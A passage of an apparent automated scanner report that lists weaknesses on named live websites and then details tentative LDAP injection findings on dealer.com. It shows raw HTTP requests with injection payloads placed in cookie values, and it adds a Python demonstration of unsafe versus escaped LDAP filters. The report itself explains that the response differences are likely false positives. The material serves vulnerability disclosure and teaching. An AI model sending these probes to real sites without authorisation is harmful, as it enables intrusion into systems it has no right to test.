4.303. http://shop.ca.com/applications/email/d_subscribe.asp [__utmc cookie]

4.304. http://shop.ca.com/applications/email/d_subscribe.asp [__utmz cookie]

4.305. http://shop.ca.com/applications/email/d_subscribe.asp [_clogin cookie]

4.306. http://shop.ca.com/cgi-bin/ShoppingCart.asp [Cart cookie]

4.307. http://shop.ca.com/cgi-bin/ShoppingCart.asp [CoreID6 cookie]

4.308. http://shop.ca.com/cgi-bin/ShoppingCart.asp [DB cookie]

4.309. http://shop.ca.com/cgi-bin/ShoppingCart.asp [IS3_GSV cookie]

4.310. http://shop.ca.com/cgi-bin/ShoppingCart.asp [IS3_History cookie]

4.311. http://shop.ca.com/cgi-bin/ShoppingCart.asp [SessionId cookie]

4.312. http://shop.ca.com/cgi-bin/ShoppingCart.asp [__utma cookie]

4.313. http://shop.ca.com/cgi-bin/ShoppingCart.asp [__utmb cookie]

4.314. http://shop.ca.com/cgi-bin/ShoppingCart.asp [__utmc cookie]

4.315. http://shop.ca.com/cgi-bin/ShoppingCart.asp [__utmz cookie]

4.316. http://shop.ca.com/cgi-bin/ShoppingCart.asp [_clogin cookie]

4.317. http://shop.ca.com/cgi-bin/order.asp [Cart cookie]

4.318. http://shop.ca.com/cgi-bin/order.asp [CoreID6 cookie]

4.319. http://shop.ca.com/cgi-bin/order.asp [DB cookie]

4.320. http://shop.ca.com/cgi-bin/order.asp [IS3_GSV cookie]

4.321. http://shop.ca.com/cgi-bin/order.asp [IS3_History cookie]

4.322. http://shop.ca.com/cgi-bin/order.asp [SessionId cookie]

4.323. http://shop.ca.com/cgi-bin/order.asp [__utma cookie]

4.324. http://shop.ca.com/cgi-bin/order.asp [__utmb cookie]

4.325. http://shop.ca.com/cgi-bin/order.asp [__utmc cookie]

4.326. http://shop.ca.com/cgi-bin/order.asp [__utmz cookie]

4.327. http://shop.ca.com/cgi-bin/order.asp [_clogin cookie]

5. Flash cross-domain policy

5.1. http://cspix.media6degrees.com/crossdomain.xml

5.2. http://images.dealer.com/crossdomain.xml

5.3. http://pictures.dealer.com/crossdomain.xml

5.4. http://pixel.33across.com/crossdomain.xml

5.5. http://static.dealer.com/crossdomain.xml

5.6. http://videos.dealer.com/crossdomain.xml

5.7. http://videos2.dealer.com/crossdomain.xml

5.8. http://mt0.google.com/crossdomain.xml

6. Silverlight cross-domain policy

7. Cleartext submission of password

7.1. http://community.martindale.com/groups/groupdirectory.aspx

7.2. http://community.martindale.com/upgrade-your-connected-account.aspx

7.3. http://tbe.taleo.net/NA8/ats/careers/jobSearch.jsp

7.4. http://www.100zakladok.ru/save/

7.5. http://www.2linkme.com/

7.6. http://www.adifni.com/account/bookmark/

7.7. http://www.adifni.com/account/bookmark/

7.8. http://www.arto.com/section/user/login/

7.9. http://www.auditmypc.com/firewall-test.asp

7.10. http://www.bookmark.it/bookmark.php

7.11. http://www.bookmark.it/bookmark.php

7.12. http://www.bookmerken.de/

7.13. http://www.brainify.com/Bookmark.aspx

7.14. http://www.cirip.ro/post/

7.15. http://www.classicalplace.com/

7.16. http://www.colivia.de/login.php

7.17. http://www.colivia.de/submit.php

7.18. http://www.diglog.com/submit.aspx

7.19. http://www.drimio.com/drimthis/index

7.20. http://www.embarkons.com/sharer.php

7.21. http://www.embarkons.com/sharer.php

7.22. http://www.embarkons.com/sharer.php/a

7.23. http://www.embarkons.com/sharer.php/a

7.24. http://www.embarkons.com/sharer.php/images/close-icon.gif

7.25. http://www.embarkons.com/sharer.php/images/close-icon.gif

7.26. http://www.embarkons.com/sharer.php/images/postit-bulb.gif

7.27. http://www.embarkons.com/sharer.php/images/postit-bulb.gif

7.28. http://www.embarkons.com/sharer.php/images/postitsubmitbtn.png

7.29. http://www.embarkons.com/sharer.php/images/postitsubmitbtn.png

7.30. http://www.embarkons.com/sharer.php/images/search-con.gif

7.31. http://www.embarkons.com/sharer.php/images/search-con.gif

7.32. http://www.embarkons.com/sharer.php/src/captcha.php

7.33. http://www.embarkons.com/sharer.php/src/captcha.php

7.34. http://www.ezyspot.com/submit

7.35. http://www.forceindya.com/submit

7.36. http://www.fulbright.com/

7.37. http://www.fulbright.com/index.cfm

7.38. http://www.fulbright.com/insite

7.39. http://www.fulbright.com/insite

7.40. http://www.gabbr.com/login/

7.41. http://www.gabbr.com/submit/

7.42. http://www.gamekicker.com/node/add/drigg

7.43. http://www.imera.com.br/post_d.html

7.44. http://www.influx.com.br/

7.45. http://www.jamespot.com/

7.46. http://www.jumptags.com/add/

7.47. http://www.librerio.com/inbox

7.48. http://www.linkagogo.com/go/AddNoPopup

7.49. http://www.livejournal.com/update.bml

7.50. http://www.longislanderotic.com/longislanderotic/forum/

7.51. http://www.longislanderotic.com/longislanderotic/forum/default.asp

7.52. http://www.longislanderotic.com/longislanderotic/forum/insufficient_permission.asp

7.53. http://www.longislanderotic.com/longislanderotic/forum/login_user.asp

7.54. http://www.martindale.com/ContactUs.aspx

7.55. http://www.martindale.com/all/c-england/all-lawyers-1.htm

7.56. http://www.martindale.com/all/c-england/all-lawyers-10.htm

7.57. http://www.martindale.com/all/c-england/all-lawyers-11.htm

7.58. http://www.martindale.com/all/c-england/all-lawyers-2.htm

7.59. http://www.martindale.com/all/c-england/all-lawyers-3.htm

7.60. http://www.martindale.com/all/c-england/all-lawyers-4.htm

7.61. http://www.martindale.com/all/c-england/all-lawyers-5.htm

7.62. http://www.martindale.com/all/c-england/all-lawyers-6.htm

7.63. http://www.martindale.com/all/c-england/all-lawyers-7.htm

7.64. http://www.martindale.com/all/c-england/all-lawyers-8.htm

7.65. http://www.martindale.com/all/c-england/all-lawyers-9.htm

7.66. http://www.martindale.com/all/c-england/all-lawyers.htm

7.67. http://www.phelpsdunbar.com/firm-news/press-release/article/phelps-dunbar-llp-partner-named-mississippi-leader-in-law-1474.html

7.68. http://www.phelpsdunbar.com/firm-news/press-release/article/tampa-attorneys-contribute-to-american-bar-associations-national-fair-labor-standards-act-flsa.html

7.69. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html

7.70. http://www.phelpsdunbar.com/pages/register_newsletters/index.html

8. SSL cookie without secure flag set

8.1. https://auctions.godaddy.com/

8.2. https://cc.dealer.com/views/login

8.3. https://community.qualys.com/docs/DOC-1542

8.4. https://email.phelps.com/exchweb/bin/auth/owaauth.dll

8.5. https://home.mcafee.com/WebServices/AccountWebSvc.asmx/js

8.6. https://home.mcafee.com/secure/cart/

8.7. https://home3.ca.com/Login2.aspx

8.8. https://myaccount.bitdefender.com/site/MyAccount/login/

8.9. https://secure.eset.com/us/store/geoIpRedirect

8.10. https://secure.opinionlab.com/ccc01/comment_card.asp

8.11. https://www.box.net/api/1.0/import

8.12. https://www.fathomseo.com/

8.13. https://www.godaddy.com/domains/popups/icannfee.aspx

8.14. https://www.trendsecure.com/my_account/signin/login

8.15. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/privacystatement/internetprivacystatement.do

8.16. https://cc.dealer.com/views/forgot-password

8.17. https://cc.dealer.com/views/login

8.18. https://www.godaddy.com/gdshop/registrar/search.asp

8.19. https://www.mcafeesecure.com/RatingVerify

8.20. https://www.paypal.com/cgi-bin/webscr

9. Session token in URL

9.1. http://aolproductcentral.aol.com/ClickBroker

9.2. https://aolproductcentral.aol.com/control/additem

9.3. http://bh.contextweb.com/bh/set.aspx

9.4. http://cc.dealer.com/views/login

9.5. http://cc.dealer.com/views/login

9.6. https://cc.dealer.com/views/login

9.7. http://fls.doubleclick.net/activityi

9.8. http://l.sharethis.com/pview

9.9. http://mbox9e.offermatica.com/m2/eset/mbox/standard

9.10. http://tbe.taleo.net/NA8/ats/careers/jobSearch.jsp

9.11. http://webroot.tt.omtrdc.net/m2/webroot/mbox/standard

9.12. http://www.amazon.com/gp/product/0975264001

9.13. http://www.dzone.com/links/add.html

9.14. http://www.facebook.com/extern/login_status.php

9.15. http://www.hldataprotection.com/

9.16. http://www.pages05.net/WTS/event.jpeg

9.17. http://www.webroot.com/En_US/about-press-room-in-the-news.html

10. ASP.NET ViewState without MAC enabled



1. LDAP injection
There are 12 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In the instances shown below, each response pair is the same HTTP 404 error page, and the bodies differ only in the rotating testimonial and advertisement blocks (hence the differing Content-Length values); a difference of that kind is produced by the page itself and is not, on its own, evidence that the cookie value ever reached an LDAP query.
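The mechanism the background text describes, as an added worked example that is not part of the XSS.CX report or of Burp Suite: a small RFC 4515 filter parser, an unsafe and a hardened filter builder, and the report's own payload pairs (`*)(sn=*` / `*)!(sn=*` for a conjunctive query, `b330b37b000bf702)(sn=*` / `b330b37b000bf702)!(sn=*` for a disjunctive one) run through both. The `trackingId`, `uid` and `mail` filters and the directory entries are constructed for illustration only; the report shows no actual LDAP query on dealer.com.

```python
import re
# RFC 4515 section 3: characters that must be escaped inside a filter assertion value.
_RFC4515_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}

def escape_filter_value(value: str) -> str:
    """Escape untrusted text for use as an LDAP filter assertion value (RFC 4515)."""
    return "".join(_RFC4515_ESCAPES.get(ch, ch) for ch in value)

def parse_filter(text: str):
    """Parse a filter into ("&"|"|", [children]), ("!", [child]) or ("=", attr, value);
    ValueError on malformed syntax, as a directory server would reply (protocolError)."""
    pos = 0

    def node():
        nonlocal pos
        if pos >= len(text) or text[pos] != "(":
            raise ValueError(f"expected '(' at offset {pos}")
        pos += 1
        if pos >= len(text):
            raise ValueError("unexpected end of filter")
        if text[pos] in "&|":                      # conjunction / disjunction
            op, pos, children = text[pos], pos + 1, []
            while pos < len(text) and text[pos] == "(":
                children.append(node())
            result = (op, children)
        elif text[pos] == "!":                     # negation
            pos += 1
            result = ("!", [node()])
        else:                                      # attr=value item
            end = text.find(")", pos)
            attr, eq, value = text[pos:end].partition("=")
            if end == -1 or not eq or "(" in attr + value:
                raise ValueError(f"malformed item at offset {pos}")
            result, pos = ("=", attr, value), end
        if pos >= len(text) or text[pos] != ")":
            raise ValueError(f"expected ')' at offset {pos}")
        pos += 1
        return result

    tree = node()
    if pos != len(text):
        raise ValueError(f"trailing data at offset {pos}")
    return tree

def _value_matches(pattern: str, actual: str) -> bool:
    """Unescaped '*' is a wildcard; '\\xx' hex escapes stand for literal characters."""
    unescape = lambda s: re.sub(r"\\([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)
    regex = ".*".join(re.escape(unescape(piece)) for piece in pattern.split("*"))
    return re.fullmatch(regex, actual, re.IGNORECASE) is not None

def evaluate(tree, entry: dict) -> bool:
    """Evaluate a parsed filter against one directory entry (a dict of attributes)."""
    kind = tree[0]
    if kind == "&":
        return all(evaluate(child, entry) for child in tree[1])
    if kind == "|":
        return any(evaluate(child, entry) for child in tree[1])
    if kind == "!":
        return not evaluate(tree[1][0], entry)
    _, attr, value = tree
    return attr in entry and _value_matches(value, entry[attr])

def search(filter_text: str, directory) -> list:
    """cn of every entry the filter matches; ValueError if the filter is malformed."""
    tree = parse_filter(filter_text)
    return [entry["cn"] for entry in directory if evaluate(tree, entry)]

# Assumed application queries: the report shows no actual LDAP filter on dealer.com.
def unsafe_filter(cookie_value: str) -> str:
    """Vulnerable: the cookie value is concatenated into a conjunctive (&) filter."""
    return f"(&(trackingId={cookie_value})(objectClass=person))"

def safe_filter(cookie_value: str) -> str:
    """Hardened: the same query with the value escaped before concatenation."""
    return f"(&(trackingId={escape_filter_value(cookie_value)})(objectClass=person))"

def unsafe_disjunctive_filter(login: str) -> str:
    """Vulnerable disjunctive (|) form, the shape the hex-token payload pair targets."""
    return f"(|(uid={login})(mail={login}))"

def probe(build, payload: str, directory) -> str:
    """What an application observably does for one probe: results, nothing, or an error."""
    try:
        return ",".join(search(build(payload), directory)) or "no match"
    except ValueError:
        return "syntax error"

# Constructed sample directory, not data from any site in the report.
DIRECTORY = [
    {"cn": "alice", "sn": "Smith", "trackingId": "1", "objectClass": "person"},
    {"cn": "bob", "sn": "Jones", "trackingId": "2", "objectClass": "person"},
    {"cn": "svc-monitor", "trackingId": "3", "objectClass": "person"},  # no sn
]

if __name__ == "__main__":
    for build in (unsafe_filter, safe_filter, unsafe_disjunctive_filter):
        for payload in ("*)(sn=*", "*)!(sn=*"):
            print(f"{build.__name__:25} {payload:10} -> {probe(build, payload, DIRECTORY)}")
```

The scanner's heuristic rests on the asymmetry the example reproduces: `*)(sn=*` closes the injected item and adds a clause that is syntactically valid and matches every entry with a surname, while `*)!(sn=*` leaves a stray `!` outside parentheses, so the filter fails to parse and the server returns an error. Two observably different outcomes for the pair is the signal; with RFC 4515 escaping both probes become a literal `trackingId` value, match nothing, and the responses are identical. The same asymmetry is what a manual confirmation should look for, rather than any difference at all between two responses.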



1.1. http://www.dealer.com/lvlc/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./products/inventory-marketing/ cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /lvlc/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./products/inventory-marketing/ cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the com.silverpop.iMA.page_visit./products/inventory-marketing/ cookie. These two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /lvlc/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/lvlc/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=*)(sn=*; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002780; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A6%3A%22%2Flvlc%2F%22%3Bi%3A1%3Bs%3A14%3A%22%2Fblog%2F2010%2F06%2F%22%3Bi%3A2%3Bs%3A17%3A%22%2Fcompany%2Fhistory%2F%22%3Bi%3A3%3Bs%3A16%3A%22%2Fcompany%2Fawards%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.38.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 19816
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:20:58 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003257; expires=Mon, 16-Apr-2012 01:20:57 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>There is one system I can log into to access all my tools.</p>
   <cite>Mitchell Brenner, Precision Acura</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>I&#8217;ve had access to other people&#8217;s systems, so I can honestly say that Dealer.com is by far the easiest to for the end user.</p>
   <cite>Christopher Della Bella, D&#8217;Ella Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We went from a site that was converting at a rate of 2 or 3 percent. Now we&#8217;re converting at 10, 11, 12, 13 percent depending on the month.</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We&#8217;re getting more qualified traffic to our website. We&#8217;re getting more qualified leads and we&#8217;re closing a higher percentage of them.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We have been with Dealer.com now almost 3 years and we&#8217;re most impressed with the customer service and technology that they provide us.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/online-advertisin
...[SNIP]...

Request 2

GET /lvlc/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/lvlc/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=*)!(sn=*; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002780; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A6%3A%22%2Flvlc%2F%22%3Bi%3A1%3Bs%3A14%3A%22%2Fblog%2F2010%2F06%2F%22%3Bi%3A2%3Bs%3A17%3A%22%2Fcompany%2Fhistory%2F%22%3Bi%3A3%3Bs%3A16%3A%22%2Fcompany%2Fawards%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.38.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20064
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:20:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003258; expires=Mon, 16-Apr-2012 01:20:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Throughout my first few years here, researching and developing both a website and the Internet Sales Department for this dealership, I have used several nationally known Internet Service Providers (ISP). Dealer.com ended up the clear winner for more reasons than I &#8230;</p>
   <cite>Mike Poulin, Shearer Pontiac Cadillac Hummer</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p> If I were to suggest any web provider in the world, I would suggest Dealer.com. Sign up today!</p>
   <cite>Alex Jefferson, Proctor Dealerships </cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>From website performance, to more visitors and more conversions, everything we were looking for improvement from has improved.</p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>The TotalControl DOMINATOR package really seems like the best automotive pay-per-click tool that I have discovered to date.</p>
   <cite>Brian Pasch, Pasch Consulting Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We have been with Dealer.com now almost 3 years and we&#8217;re most impressed with the customer service and technology that they provide us.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Mar
...[SNIP]...

1.2. http://www.dealer.com/lvlc/media/uploads/page/loading.gif [exp_last_activity cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /lvlc/media/uploads/page/loading.gif

Issue detail

The exp_last_activity cookie appears to be vulnerable to LDAP injection attacks.

The payloads b330b37b000bf702)(sn=* and b330b37b000bf702)!(sn=* were each submitted in the exp_last_activity cookie. These two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /lvlc/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/lvlc/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=b330b37b000bf702)(sn=*; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A6%3A%22%2Flvlc%2F%22%3Bi%3A1%3Bs%3A14%3A%22%2Fblog%2F2010%2F06%2F%22%3Bi%3A2%3Bs%3A17%3A%22%2Fcompany%2Fhistory%2F%22%3Bi%3A3%3Bs%3A16%3A%22%2Fcompany%2Fawards%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.38.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20004
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:27:58 GMT
Connection: close
Set-Cookie: exp_last_visit=b330b37b000bf702%29%28sn%3D%2A; expires=Mon, 16-Apr-2012 01:27:58 GMT; path=/
Set-Cookie: exp_last_activity=1303003678; expires=Mon, 16-Apr-2012 01:27:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>It was very important to find someone with a suite of products that could not only help us today, but could help us in the long term.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Our sites perform better now than they ever have. Our dealers are very happy with our performance. Everyone&#8217;s extremely pleased with Dealer.com.</p>
   <cite>Cassie Broemmer, Van Tuyl Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>From an Enterprise Level, Dealer.com's products have saved me hours a month in gathering my reporting and understanding what our site is doing for us. </p>
   <cite>Dan Boismer, Suburban Collection</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>The TotalControl DOMINATOR package really seems like the best automotive pay-per-click tool that I have discovered to date.</p>
   <cite>Brian Pasch, Pasch Consulting Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We were able to have our design and brand vision executed. It is very important that we look the way we want to look and that we represent our company and our brand in a specific way and Dealer.com accomplished that. &#8230;</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Service_marketingtil
...[SNIP]...

Request 2

GET /lvlc/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/lvlc/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=b330b37b000bf702)!(sn=*; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A6%3A%22%2Flvlc%2F%22%3Bi%3A1%3Bs%3A14%3A%22%2Fblog%2F2010%2F06%2F%22%3Bi%3A2%3Bs%3A17%3A%22%2Fcompany%2Fhistory%2F%22%3Bi%3A3%3Bs%3A16%3A%22%2Fcompany%2Fawards%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.38.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20158
Vary: Accept-Encoding
